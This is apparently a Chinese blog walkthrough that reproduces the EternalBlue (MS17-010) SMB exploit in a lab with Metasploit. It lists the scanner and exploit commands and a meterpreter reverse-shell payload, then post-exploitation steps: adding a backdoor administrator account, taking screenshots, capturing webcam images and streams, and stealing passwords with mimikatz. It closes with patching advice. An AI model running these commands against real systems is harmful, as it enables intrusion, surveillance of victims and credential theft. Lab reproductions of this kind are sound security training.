永恒之蓝漏洞复现(ms17-010)

Metasploit

 

Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。

 

MSF的更新:apt update

                     apt install metasploit-framework

 

使用方法

 

        进入框架:msfconsole

        使用 search命令查找相关漏洞: search  ms17-010

        使用use进入模块:  use exploit/windows/smb/ms17_010_eternalblue  

        使用info查看模块信息: info

        设置攻击载荷:set payload windows/x64/meterpreter/reverse_tcp

        查看模块需要配置的参数:show options

        设置参数:set  RHOST  192.168.125.138

        攻击:exploit /  run

        后渗透阶段

 

不同的攻击用到的步骤也不一样,接下来我们用永恒之蓝ms17-010来熟悉一下MSF工具的使用

 

 

一、漏洞描述:

Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

 

二、影响版本:

目前已知受影响的Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

 

三、复现环境:

攻击机:Linux kali4.18.0-kali1-amd64 (IP:192.168.248.130)

靶机:Windows Server  2008  (IP:192.168.248.140)

 

四、复现过程:

1.     主机发现

登录kali linux,用nmap探测本网段存活主机 nmap -r 192.168.248.0/24

永恒之蓝漏洞复现(ms17-010)

探测到存活主机ip:192.168.248.140,并探测到开放445端口,而永恒之蓝利用的就是445端口的smb服务,操作系统溢出漏洞。

 

2.     进入MSF框架

执行msfconsole命令

永恒之蓝漏洞复现(ms17-010)

 

3、搜索ms17-010代码 msf > search ms17_010

永恒之蓝漏洞复现(ms17-010)

这里可以得到两个工具,其中auxiliary/scanner/smb/smb_ms17_010是永恒之蓝扫描模块,

                                           exploit/windows/smb/ms17_010_eternalblue是永恒之蓝攻击代码,

一般配合使用,前者先扫描,若显示有漏洞,再进行攻击。

 

4、使用ms17-010扫描模块,对靶机Win7进行扫描

使用模块

msf> use auxiliary/scanner/smb/smb_ms17_010

设置目标ip或网段

msfauxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.248.140

执行扫描

msfauxiliary(scanner/smb/smb_ms17_010) > run

永恒之蓝漏洞复现(ms17-010)

 

 

5、 使用ms17-010攻击模块,对靶机Win7进行攻击

使用模块

 

msf> use exploit/windows/smb/ms17_010_eternalblue

设置攻击目标ip

msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST192.168.23.133

查看设置选项

msfexploit(windows/smb/ms17_010_eternalblue) > show options

永恒之蓝漏洞复现(ms17-010)

执行攻击

msfexploit(windows/smb/ms17_010_eternalblue) > run

永恒之蓝漏洞复现(ms17-010)

 

6、直接拿到Win7的Shell,之后便可以通过Shell对目标靶机进行控制。

shell

永恒之蓝漏洞复现(ms17-010)

创建新用户 root              

net user root 123456 /add

 

将用户 root 添加至管理员组

net localgroup administrators root /add

永恒之蓝漏洞复现(ms17-010)

 

永恒之蓝漏洞复现(ms17-010)

通过meterpreter > screenshot可以截取对方屏幕信息。然后打开文件就可以看到截图了。

 

也可以载入mimikatz meterpreter > load mimikatz然后使用命令wdigest获取系统管理密码

 

screenshot                       //截图

webcam_list                   //查看目标机是否有摄像头

webcam_snap               //打开目标摄像头,拍一张照片

webcam_stream           //开启直播模式

shell                         //进入到目标机的shell下面

Exit                        //停止meterpreter会话

 

五、漏洞修复

①在线更新;开启Windows Update更新。

②打补丁;此漏洞对应的微软补丁地址:https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2017/ms17-010

 

 

上一篇:20210621SMB1协议安全问题


下一篇:Matrix Gym - 103145A “红旗杯”第十五届